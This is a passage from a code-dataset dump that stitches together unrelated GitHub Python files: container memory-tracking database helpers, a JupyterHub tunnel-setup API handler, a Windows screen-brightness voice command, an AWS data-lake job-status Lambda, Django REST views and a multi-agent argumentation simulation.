cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tif not data_list and not time_list:\n\t\t\tlogging.info('Not Find any Container History for %s on Local Database', name)\n\t\treturn data_list, time_list\n\n\n# Function to remove a container stored data from local database\n\n\ndef delete_local_container_history(name: str):\n\tquery = \"DELETE FROM container_history WHERE name = %s\"\n\tinfo = (name,)\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tlogging.info('Container %s History Deleted from Local Database', name)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\n# ---------- Policies Database Functions ----------\n\n\ndef get_container_memory_consumption(name, window_length):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s ORDER BY time DESC LIMIT %s\"\n\tinfo = (name, window_length)\n\n\tdata_list = []\n\ttime_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor(buffered=True)\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tprint('Tamanho Datalist = ', len(data_list))\n\t\t\tprint('Wall Time: ',(time_list[0] - time_list[-1]).seconds, ' seconds')\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tdelta = 0\n\t\tswapdelta = 0\n\n\t\tfor index in range(len(data_list) - 1):\n\t\t\tif parser['Container']['type'] == 'LXC':\n\t\t\t\tdelta += data_list[index].getUsedMemory2() - data_list[index + 1].getUsedMemory2()\n\t\t\t\tswapdelta += int(data_list[index].mem_stats['swap']) - int(data_list[index + 1].mem_stats['swap'])\n\n\t\t\telif parser['Container']['type'] == 'DOCKER':\n\t\t\t\tdelta += data_list[index].getUsedMemory() - data_list[index + 1].getUsedMemory()\n\n\t\tprint('Delta: ' + str(delta // 2 ** 20) + 'MB')\n\t\tprint('Swap Delta: ' + str(swapdelta // 2 ** 20) + 'MB')\n\t\treturn delta, swapdelta\n\n\ndef get_container_memory_consumption2(name, window_length):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s ORDER BY time DESC LIMIT %s\"\n\tinfo = (name, window_length)\n\n\tdata_list = []\n\ttime_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor(buffered=True)\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\t#print('Tamanho Datalist = ', len(data_list))\n\t\t\twalltime = (time_list[0] - time_list[-1]).seconds\n\t\t\t#print('Wall Time: ', walltime, ' seconds')\n\t\t\tlogging.info('Container: %s, Datalist Size: %d, Wall Time: %d s', name, len(data_list), walltime)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tmemory_used = 0\n\t\tswap_used = 0\n\t\tpage_faults = 0\n\t\tmajor_faults = 0\n\n\t\tprint('Container: ', name, ' Init Window: ', time_list[0], ' End Window: ', time_list[-1],\n\t\t\t 'Wall: ', (time_list[0] - time_list[-1]).seconds, flush=True)\n\n\t\tfor index in range(len(data_list) - 1):\n\t\t\tmemory_used += data_list[index].getUsedMemory() - data_list[index + 1].getUsedMemory()\n\t\t\tpage_faults += data_list[index].getMemoryPageFaults() - data_list[index + 1].getMemoryPageFaults()\n\t\t\tmajor_faults += data_list[index].getMemoryMajorFaults() - data_list[index + 1].getMemoryMajorFaults()\n\n\t\t\tif parser['Container']['type'] == 'LXC':\n\t\t\t\tswap_used += int(data_list[index].mem_stats['swap']) - int(data_list[index + 1].mem_stats['swap'])\n\n\t\t\telif parser['Container']['type'] == 'DOCKER':\n\t\t\t\tprint('Calcular uso de swap no Docker')\n\n\t\t#print('Delta: ' + str(memory_used // 2 ** 20) + 'MB')\n\t\t#print('Swap Delta: ' + str(swap_used // 2 ** 20) + 'MB')\n\t\t#print('Page Faults: ', page_faults)\n\t\t#print('Major Faults: ', major_faults)\n\t\tlogging.info('Container: %s, MemUsed: %s MB, SwapUsed: %s MB, PgFaults: %d, PgMajorFaults: %d',\n\t\t\t\t\tname, str(memory_used // 2 ** 20), str(swap_used // 2 ** 20), page_faults, major_faults)\n\n\t\treturn {'memory': memory_used, 'swap': swap_used, 'page_faults': page_faults, 'major_faults': major_faults}\n\n\ndef get_container_memory_consumption3(name, last_sched):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s AND time >= %s ORDER BY time DESC\"\n\tinfo = (name, last_sched)\n\n\tdata_list = []\n\ttime_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor(buffered=True)\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tmemory_used = 0\n\t\tswap_used = 0\n\t\tmajor_faults = 0\n\n\t\t#print('Tamanho Datalist = ', len(data_list)\n\t\twalltime = (time_list[0] - time_list[-1]).seconds\n\t\tlogging.info('Container: %s, Datalist Size: %d, Wall Time: %d s', name, len(data_list), walltime)\n\n\t\tprint('Container: ', name, ' Init Window: ', time_list[0], ' End Window: ', time_list[-1],\n\t\t\t 'Wall: ', (time_list[0] - time_list[-1]).seconds, flush=True)\n\n\t\tfor index in range(len(data_list) - 1):\n\t\t\tmemory_used += (data_list[index].getUsedMemory() - data_list[index + 1].getUsedMemory()) #// (time_list[index] - time_list[index + 1]).seconds\n\t\t\tmajor_faults += data_list[index].getMemoryMajorFaults() - data_list[index + 1].getMemoryMajorFaults()\n\n\t\t\tif parser['Container']['type'] == 'LXC':\n\t\t\t\tswap_used += (int(data_list[index].mem_stats['swap']) - int(data_list[index + 1].mem_stats['swap'])) #// (time_list[index] - time_list[index + 1]).seconds\n\n\t\t\telif parser['Container']['type'] == 'DOCKER':\n\t\t\t\tprint('Calcular uso de swap no Docker')\n\n\t\tmemory_used = memory_used // walltime\n\t\tswap_used = swap_used // walltime\n\n\t\tlogging.info('Container: %s, MemUsed: %s MB/s, SwapUsed: %s MB/s, PgMajorFaults: %d',\n\t\t\t\t\tname, str(memory_used // 2 ** 20), str(swap_used // 2 ** 20), major_faults)\n\n\t\treturn {'memory': memory_used, 'swap': swap_used, 'major_faults': major_faults}\n\n\ndef get_container_memory_consumption4(name, short_sched, long_sched):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s AND time >= %s ORDER BY time\"\n\tinfo1 = (name, short_sched)\n\tinfo2 = (name, long_sched)\n\n\tdatalist_short = []\n\tdatalist_long = []\n\ttimelist_short = []\n\ttimelist_long = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor(buffered=True)\n\t\t\tcursor.execute(query, info1)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdatalist_short.append(container)\n\t\t\t\ttimelist_short.append(time)\n\n\t\t\tcursor.execute(query, info2)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdatalist_long.append(container)\n\t\t\t\ttimelist_long.append(time)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tmemory_used_short = 0\n\t\tmemory_used_long = 0\n\t\tswap_used_short = 0\n\t\tswap_used_long = 0\n\t\tmajor_faults = 0\n\n\t\twalltime_long = (timelist_long[-1] - timelist_long[0]).seconds\n\t\twalltime_short = (timelist_short[-1] - timelist_short[0]).seconds\n\n\t\tmemory_used_short += (datalist_short[-1].getUsedMemory() - datalist_short[0].getUsedMemory()) // walltime_short\n\t\tmemory_used_long += (datalist_long[-1].getUsedMemory() - datalist_long[0].getUsedMemory()) // walltime_long\n\t\tmajor_faults += datalist_long[-1].getMemoryMajorFaults() - datalist_long[0].getMemoryMajorFaults()\n\n\t\tif parser['Container']['type'] == 'LXC':\n\t\t\tswap_used_short += (int(datalist_short[-1].mem_stats['swap']) - int(datalist_short[0].mem_stats['swap'])) // walltime_short\n\t\t\tswap_used_long += (int(datalist_long[-1].mem_stats['swap']) - int(datalist_long[0].mem_stats['swap'])) // walltime_long\n\n\t\telif parser['Container']['type'] == 'DOCKER':\n\t\t\tprint('Calcular uso de swap no Docker')\n\n\t\tif(memory_used_long + swap_used_long) <= (memory_used_short + swap_used_short):\n\t\t\tmemory_used = memory_used_short\n\t\t\tswap_used = swap_used_short\n\n\t\telse:\n\t\t\tmemory_used = (memory_used_long + memory_used_short) / 2\n\t\t\tswap_used = (swap_used_long + swap_used_short) / 2\n\n\t\tlogging.info('Container: %s, MemUsed: %s MB/s, SwapUsed: %s MB/s, PgMajorFaults: %d',\n\t\t\t\t\tname, str(memory_used // 2 ** 20), str(swap_used // 2 ** 20), major_faults)\n\n\t\treturn {'memory': memory_used, 'swap': swap_used, 'major_faults': major_faults}\n\n\ndef get_container_memory_consumption_ED(name, window_length):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s ORDER BY time DESC LIMIT %s\"\n\tinfo = (name, window_length)\n\n\tdata_list = []\n\ttime_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor(buffered=True)\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tprint('Tamanho Datalist = ', len(data_list))\n\t\t\tprint('Wall Time: ',(time_list[0] - time_list[-1]).seconds, ' seconds')\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tdelta = 0\n\n\t\tfor index in range(len(data_list)):\n\t\t\tif (index % 2) == 0:\n\t\t\t\tif parser['Container']['type'] == 'LXC':\n\t\t\t\t\tdelta += data_list[index].getUsedMemory2()\n\n\t\t\t\telif parser['Container']['type'] == 'DOCKER':\n\t\t\t\t\tdelta += data_list[index].getUsedMemory()\n\n\t\tmedia = delta // (len(data_list) // 2)\n\n\t\tprint('Media: ' + str(media // 2 ** 20) + 'MB')\n\t\treturn media\n","repo_name":"Zilves/elasticcontainer","sub_path":"utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":25369,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"40966484968","text":"import datetime\nimport inspect\nimport json\n\nfrom jupyterhub.apihandlers import default_handlers\nfrom jupyterhub.apihandlers.base import APIHandler\nfrom jupyterhub.scopes import needs_scope\nfrom tornado import web\n\n\nclass SetupTunnelAPIHandler(APIHandler):\n @needs_scope(\"access:servers\")\n async def post(self, user_name, server_name=\"\"):\n self.set_header(\"Cache-Control\", \"no-cache\")\n if server_name is None:\n server_name = \"\"\n user = self.find_user(user_name)\n if user is None:\n # no such user\n raise web.HTTPError(404)\n if server_name not in user.spawners:\n # user has no such server\n raise web.HTTPError(404)\n body = self.request.body.decode(\"utf8\")\n try:\n json_body = json.loads(body) if body else {}\n except:\n self.set_status(400)\n self.log.exception(\n f\"{user_name}:{server_name} - Could not load body into json. Body: {body}\"\n )\n return\n\n user = self.find_user(user_name)\n spawner = user.spawners[server_name]\n\n if spawner._stop_pending:\n self.log.debug(\n f\"{spawner._log_name} - APICall: SetupTunnel - but spawner is already stopping.\",\n extra={\n \"log_name\": spawner._log_name,\n \"user\": user_name,\n \"action\": \"setuptunnel\",\n \"event\": json_body,\n },\n )\n self.set_header(\"Content-Type\", \"text/plain\")\n self.write(\"Bad Request.\")\n self.set_status(400)\n return\n\n if json_body:\n self.log.debug(\n f\"{spawner._log_name} - APICall: SetupTunnel\",\n extra={\n \"log_name\": spawner._log_name,\n \"user\": user_name,\n \"action\": \"setuptunnel\",\n \"event\": json_body,\n },\n )\n try:\n spawner.port_forward_info.update(json_body)\n spawner.orm_spawner.state = spawner.get_state()\n self.db.commit()\n await spawner.run_ssh_forward()\n except Exception as e:\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S.%f\")[:-3]\n failed_event = {\n \"progress\": 100,\n \"failed\": True,\n \"html_message\": f\"{now}: Could not setup tunnel {str(e)} \",\n }\n self.log.exception(\n f\"{spawner._log_name} - Could not setup tunnel for {user_name}:{server_name}\",\n extra={\n \"log_name\": spawner._log_name,\n \"user\": user_name,\n \"action\": \"tunnelfailed\",\n \"event\": failed_event,\n },\n )\n stop = spawner.stop(cancel=True, event=failed_event)\n if inspect.isawaitable(stop):\n await stop\n self.set_header(\"Content-Type\", \"text/plain\")\n self.set_status(400)\n return\n else:\n self.set_header(\"Content-Type\", \"text/plain\")\n self.set_status(204)\n return\n else:\n self.set_header(\"Content-Type\", \"text/plain\")\n self.write(\"Bad Request.\")\n self.set_status(400)\n return\n\n\ndefault_handlers.append((r\"/api/users/setuptunnel/([^/]+)\", SetupTunnelAPIHandler))\ndefault_handlers.append(\n (r\"/api/users/setuptunnel/([^/]+)/([^/]+)\", SetupTunnelAPIHandler)\n)\n","repo_name":"kreuzert/jupyterhub-forwardbasespawner","sub_path":"forwardbasespawner/api_setup_tunnel.py","file_name":"api_setup_tunnel.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19198442819","text":"import difflib\r\nimport wmi\r\nimport screen_brightness_control as sbc\r\nimport re\r\n\r\ndef extract_numbers(text):\r\n numbers = re.findall(r'\\d+', text)\r\n return [int(num) for num in numbers]\r\n\r\ndef light_judgement(text, score_line = 0.5):\r\n text = text.lower()\r\n increase_keywords = [\"调高\",\"增大\",\"更亮\",\"太暗了\",\"亮点\",\"brighter\",\"more\",\"too dark\"]\r\n decrease_keywords = [\"调低\",\"减小\",\"更暗\",\"太亮了\",\"暗点\",\"darker\",\"less\",\"too dark\"]\r\n volume_adjustment = [\"亮度调节\", \"亮度到\", \"亮度设置\", \"亮度调整\", \"把亮度\",\"调节为\",\"adjust to\", \"set to\", \"change to\", \"turn to\"]\r\n \r\n for keyword in increase_keywords:\r\n tmp_score = difflib.SequenceMatcher(None, text , keyword).ratio()\r\n print(tmp_score,\"1\")\r\n if tmp_score > score_line:\r\n return -1\r\n for keyword in decrease_keywords:\r\n tmp_score = difflib.SequenceMatcher(None, text , keyword).ratio()\r\n print(tmp_score,\"2\")\r\n if tmp_score > score_line:\r\n return -2\r\n for keyword in volume_adjustment:\r\n tmp_score = difflib.SequenceMatcher(None, text , keyword).ratio()\r\n print(tmp_score,\"3\")\r\n if tmp_score > score_line:\r\n number = extract_numbers(text)\r\n print(\"number=\",number[0])\r\n try:\r\n if 0 <= int(number[0]) <= 100:\r\n return number[0]\r\n except ValueError:\r\n print(\"ERROR:该亮度不存在!\")\r\n pass\r\n return -3\r\n\r\ndef brightness_control(vis):\r\n c = wmi.WMI(namespace='wmi')\r\n methods = c.WmiMonitorBrightnessMethods()[0]\r\n current_brightness = sbc.get_brightness()\r\n present_brightness = current_brightness[0]\r\n print(\"当前亮度\",present_brightness)\r\n \r\n x = light_judgement(vis)\r\n\r\n if x == -1:\r\n if present_brightness <= 80:\r\n methods.WmiSetBrightness(present_brightness + 20,0)\r\n print(\"亮度已调节到\",present_brightness + 20)\r\n else: \r\n methods.WmiSetBrightness(100,0)\r\n print(\"已经最亮了,注意合理用眼!\")\r\n elif x == -2:\r\n if present_brightness >= 20:\r\n methods.WmiSetBrightness(present_brightness - 20 ,0)\r\n print(\"亮度已调节到\",present_brightness - 20)\r\n else: \r\n methods.WmiSetBrightness(0,0)\r\n print(\"看不见了!\")\r\n elif x == -3:\r\n return\r\n else:\r\n methods.WmiSetBrightness(x,0)\r\n print(\"亮度已调节到\",x)","repo_name":"panbu2007/voice-assistant-for-win","sub_path":"light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"578391877","text":"from datalake_library.commons import init_logger\nfrom datalake_library.transforms.transform_handler import TransformHandler\nfrom datalake_library import octagon\nfrom datalake_library.octagon import Artifact, EventReasonEnum, peh\nfrom datalake_library.configuration.resource_configs import DynamoConfiguration, S3Configuration\nfrom datalake_library.interfaces.dynamo_interface import DynamoInterface\nfrom datalake_library.interfaces.s3_interface import S3Interface\n\nlogger = init_logger(__name__)\n\n\ndef get_manifest_data(bucket, team, dataset, manifest_key):\n \"\"\" Returns a list of items from manifests control table \"\"\"\n dynamo_config = DynamoConfiguration()\n dynamo_interface = DynamoInterface(dynamo_config)\n s3_interface = S3Interface()\n local_path = s3_interface.download_object(bucket, manifest_key)\n ddb_keys = []\n items = []\n with open(local_path, \"r\") as raw_file:\n file_names = [file_name.strip().split(\"/\")[-1]\n for file_name in raw_file]\n for file in file_names:\n ddb_keys.append({\n \"dataset_name\": team+\"-\"+dataset,\n \"manifest_file_name\": manifest_key.split(\"/\")[-1], \"datafile_name\": file\n })\n for ddb_key in ddb_keys:\n try:\n items.append(dynamo_interface.get_item_from_manifests_control_table(\n ddb_key[\"dataset_name\"], ddb_key[\"manifest_file_name\"], ddb_key[\"datafile_name\"]))\n except KeyError:\n logger.error(\"The manifest file has not been processed in Stage A\")\n raise Exception(\"Manifest File has not been processed in Stage A\")\n\n return items\n\n\ndef get_ddb_keys(items):\n ddb_keys = []\n for item in items:\n ddb_key = {'dataset_name': item['dataset_name'],\n 'datafile_name': item['datafile_name']}\n ddb_keys.append(ddb_key)\n return ddb_keys\n\ndef lambda_handler(event, context):\n \"\"\"Calls custom job waiter developed by user\n\n Arguments:\n event {dict} -- Dictionary with details on previous processing step\n context {dict} -- Dictionary with details on Lambda context\n\n Returns:\n {dict} -- Dictionary with Processed Bucket, Key(s) and Job Details\n \"\"\"\n try:\n logger.info('Fetching event data from previous step')\n bucket = event['body']['bucket']\n keys_to_process = event['body']['keysToProcess']\n team = event['body']['team']\n stage = event['body']['pipeline_stage']\n dataset = event['body']['dataset']\n job_details = event['body']['job']['jobDetails']\n processed_keys_path = event['body']['job']['processedKeysPath']\n\n logger.info('Initializing Octagon client')\n component = context.function_name.split('-')[-2].title()\n octagon_client = (\n octagon.OctagonClient()\n .with_run_lambda(True)\n .with_configuration_instance(event['body']['env'])\n .build()\n )\n logger.info('Querying manifests control table ')\n\n items = get_manifest_data(bucket, team, dataset, keys_to_process[0])\n\n ddb_keys = get_ddb_keys(items)\n\n dynamo_config = DynamoConfiguration()\n dynamo_interface = DynamoInterface(dynamo_config)\n \n\n logger.info('Checking Job Status with user custom code')\n transform_handler = TransformHandler().stage_transform(team, dataset, stage)\n response = transform_handler().check_job_status(bucket, keys_to_process,\n processed_keys_path, job_details) # custom user code called\n response['peh_id'] = event['body']['job']['peh_id']\n\n if event['body']['job']['jobDetails']['jobStatus'] == 'FAILED':\n peh.PipelineExecutionHistoryAPI(\n octagon_client).retrieve_pipeline_execution(response['peh_id'])\n octagon_client.end_pipeline_execution_failed(component=component,\n issue_comment=\"{} {} Error: Check Job Logs\".format(stage, component))\n for ddb_key in ddb_keys:\n dynamo_interface.update_manifests_control_table_stageb(ddb_key, \"FAILED\",None,\"Glue Job Failed, Check Logs\")\n\n except Exception as e:\n logger.error(\"Fatal error\", exc_info=True)\n peh.PipelineExecutionHistoryAPI(octagon_client).retrieve_pipeline_execution(\n event['body']['job']['peh_id'])\n octagon_client.end_pipeline_execution_failed(component=component,\n issue_comment=\"{} {} Error: {}\".format(stage, component, repr(e)))\n for ddb_key in ddb_keys:\n dynamo_interface.update_manifests_control_table_stageb(\n ddb_key, \"FAILED\", None, \"Glue Job Failed, Check Logs\")\n raise e\n return response\n","repo_name":"awslabs/aws-serverless-data-lake-framework","sub_path":"sdlf-utils/pipeline-examples/manifests/stageB/lambda/stage-b-check-job/src/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","stars":369,"dataset":"github-code","pt":"61"}
+{"seq_id":"27221690622","text":"from rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Projects, Comments, Models, Tools\nfrom .serializer import ProjectSerializer, CommentsSerializer, ModelsSerializer, ToolsSerializer\nfrom django.http import Http404\nfrom rest_framework import status\n\n\nclass ProjectList(APIView):\n\tdef get(self, request, format=None):\n\t\tall_projects = Projects.get_all()\n\t\tserializers = ProjectSerializer(all_projects, many=True)\n\t\treturn Response(serializers.data)\n\n\nclass ProjectById(APIView):\n\tdef get(self, request, id,format=None):\n\t\tall_projects = Projects.get_id(id)\n\t\tserializers = ProjectSerializer(all_projects, many=False)\n\t\treturn Response(serializers.data)\n\n\nclass ProjectByModels(APIView):\n\tdef get(self, request, models,format=None):\n\t\tall_projects = Projects.filter_tool(models)\n\t\tserializers = ProjectSerializer(all_projects, many=True)\n\t\treturn Response(serializers.data)\n\n\nclass ProjectByTools(APIView):\n\tdef get(self, request, tools,format=None):\n\t\tall_projects = Projects.filter_model(tools)\n\t\tserializers = ProjectSerializer(all_projects, many=True)\n\t\treturn Response(serializers.data)\n\n\n\nclass ToolsList(APIView):\n\tdef get(self, request, format=None):\n\t\tall_items = Tools.get_all()\n\t\tserializers = ToolsSerializer(all_items, many=True)\n\t\treturn Response(serializers.data)\n\n\nclass ModelsList(APIView):\n\tdef get(self, request, format=None):\n\t\tall_items = Models.get_all()\n\t\tserializers = ModelsSerializer(all_items, many=True)\n\t\treturn Response(serializers.data)\n\n\n\nclass CommentsList(APIView):\n\tdef get(self, request,format=None):\n\t\tall_comments = Comments.get_all()\n\t\tserializers = CommentsSerializer(all_comments, many=True)\n\t\treturn Response(serializers.data)\n\n\tdef post(self, request, format=None):\n\t\t\tserializers = CommentsSerializer(data=request.data)\n\t\t\tif serializers.is_valid():\n\t\t\t\t\tserializers.save()\n\t\t\t\t\treturn Response(serializers.data, status=status.HTTP_201_CREATED)\n\t\t\treturn Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)","repo_name":"isaacwangombe/jess-render","sub_path":"Jessica/api_views.py","file_name":"api_views.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"44018857560","text":"from mesa import Model\nfrom mesa.time import RandomActivation\nimport random\n\nfrom communication.agent.CommunicatingAgent import CommunicatingAgent\nfrom communication.message.MessageService import MessageService\nfrom communication.message.MessagePerformative import MessagePerformative\nfrom communication.message.Message import Message\n\nfrom communication.preferences.CriterionName import CriterionName\nfrom communication.preferences.CriterionValue import CriterionValue\nfrom communication.preferences.Preferences import Preferences\nfrom communication.preferences.Item import Item\n\nfrom arguments.Argument import Argument\n\n\nclass ArgumentAgent(CommunicatingAgent):\n \"\"\"ArgumentAgent which inherit from CommunicatingAgent .\"\"\"\n\n def __init__(self, unique_id, model, name, preference, is_commited=False):\n super().__init__(unique_id, model, name)\n self.preference = preference\n self.is_commited = is_commited\n self.commited_val = None\n\n def step(self):\n super().step()\n if self.is_commited == True:\n pass\n else:\n messages = self.get_new_messages()\n if len(messages) != 0:\n for msg in messages:\n sender = msg.get_exp()\n performative = msg.get_performative()\n content = msg.get_content()\n if performative == MessagePerformative.PROPOSE:\n # get top 10% items according to the preference\n is_top_10_item = self.preference.is_item_among_top_10_percent(\n content, self.model.items\n )\n if is_top_10_item:\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.ACCEPT,\n content,\n )\n self.send_message(message)\n print(message)\n else:\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.ASK_WHY,\n content,\n )\n self.send_message(message)\n print(message)\n if performative == MessagePerformative.ASK_WHY:\n arg = Argument(True, content)\n prop = arg.support_proposal(content, self.preference)\n if prop != None:\n message = Message(\n self.get_name(), sender, MessagePerformative.ARGUE, arg\n )\n self.send_message(message)\n print(message)\n else:\n items_list = self.model.items.copy()\n items_list.remove(content)\n top_item = self.preference.most_preferred(items_list)\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.PROPOSE,\n top_item,\n )\n self.send_message(message)\n print(message)\n if performative == MessagePerformative.ARGUE:\n item = content.item\n couple_criterion = content.couple_values_list[0]\n is_proposing = content.decision\n if is_proposing:\n (\n same_critrion,\n criterion_name,\n criterion_val,\n ) = self.preference.better_criterion(\n item, couple_criterion.criterion_name\n )\n if same_critrion is None:\n # Accept prop\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.ACCEPT,\n item,\n )\n self.send_message(message)\n print(message)\n else:\n if same_critrion:\n # bad local value\n arg = Argument(False, item)\n arg.add_premiss_couple_values(\n criterion_name, criterion_val\n )\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.ARGUE,\n arg,\n )\n self.send_message(message)\n print(message)\n else:\n # bad on better criterion\n arg = Argument(False, item)\n arg.add_premiss_comparison(\n criterion_name, couple_criterion.criterion_name\n )\n arg.add_premiss_couple_values(\n criterion_name, criterion_val\n )\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.ARGUE,\n arg,\n )\n self.send_message(message)\n print(message)\n else:\n print(\"Response to negative ARG\")\n pass\n\n if performative in [\n MessagePerformative.ACCEPT,\n MessagePerformative.COMMIT,\n ]:\n message = Message(\n self.get_name(), sender, MessagePerformative.COMMIT, content\n )\n self.commited_val = content\n self.is_commited = True\n self.send_message(message)\n print(message)\n else:\n # get random agent\n agent_list = self.model.schedule.agents.copy()\n agent_list.remove(self)\n agent = random.choice(agent_list)\n # get the top item according to the preference\n top_item = self.preference.most_preferred(self.model.items)\n # print(self.get_name(),' top ',top_item)\n message = Message(\n self.get_name(),\n agent.get_name(),\n MessagePerformative.PROPOSE,\n top_item,\n )\n self.send_message(message)\n print(message)\n\n def get_preference(self):\n return self.preference\n\n def set_criteria(self, List_criteria):\n self.preference.get_criterion_name_list(List_criteria)\n\n def generate_preferences(self, List_items):\n List_criteria = self.preference.get_criterion_name_list()\n for i in List_items:\n for j in List_criteria:\n self.preference.add_criterion_value(\n CriterionValue(i, j, random.randint(0, 5))\n )\n\n\nclass ArgumentModel(Model):\n \"\"\"ArgumentModel which inherit from Model .\"\"\"\n\n def __init__(self, N, items, criteria):\n self.schedule = RandomActivation(self)\n self.__messages_service = MessageService(self.schedule)\n self.running = True\n self.items = items\n self.criteria = criteria\n\n for i in range(N):\n init_pref = Preferences()\n random.shuffle(self.criteria)\n init_pref.set_criterion_name_list(self.criteria)\n a = ArgumentAgent(i, self, \" agent_\" + str(i), init_pref)\n a.generate_preferences(self.items)\n self.schedule.add(a)\n\n def step(self):\n self.__messages_service.dispatch_messages()\n self.schedule.step()\n\n\nif __name__ == \"__main__\":\n # init list of items\n items = [\n Item(\"Diesel Engine\", \"A super cool diesel engine\"),\n Item(\"Electric Engine\", \"A very quiet engine\"),\n Item(\"Hybrid Engine\", \"A very efficient engine\"),\n Item(\"Petrol Engine\", \"A very cheap engine\"),\n Item(\"Gas Engine\", \"A very powerful engine\"),\n ]\n # init list of criteria\n criteria = [\n CriterionName.PRODUCTION_COST,\n CriterionName.ENVIRONMENT_IMPACT,\n CriterionName.CONSUMPTION,\n CriterionName.DURABILITY,\n CriterionName.NOISE,\n ]\n N = 3\n argument_model = ArgumentModel(N, items, criteria)\n # get the first agent\n agent = argument_model.schedule.agents[0]\n # get the preference of the first agent\n pref = agent.get_preference()\n # print(len(pref.get_criterion_value_list()))\n # for value in pref.get_criterion_value_list():\n # print(value.get_item(), value.get_criterion_name(), value.get_value())\n # get the second agent\n agent = argument_model.schedule.agents[1]\n # get the preference of the first agent\n pref = agent.get_preference()\n # print('agent 2')\n # for value in pref.get_criterion_value_list():\n # print(value.get_item(), value.get_criterion_name(), value.get_value())\n for i in range(20):\n print(\"__________________________________________________________________\")\n print(\"step \", i)\n argument_model.step()\n print(\"- - - - - - - - -- - - -- - - - - - - - - - -- - -- - - - \")\n for i in range(N):\n commited_value = argument_model.schedule.agents[i].commited_val\n if commited_value is not None:\n print(\"the agent \", i, \" is commited with value = \", commited_value)\n else:\n print(\"the agent \", i, \" is not 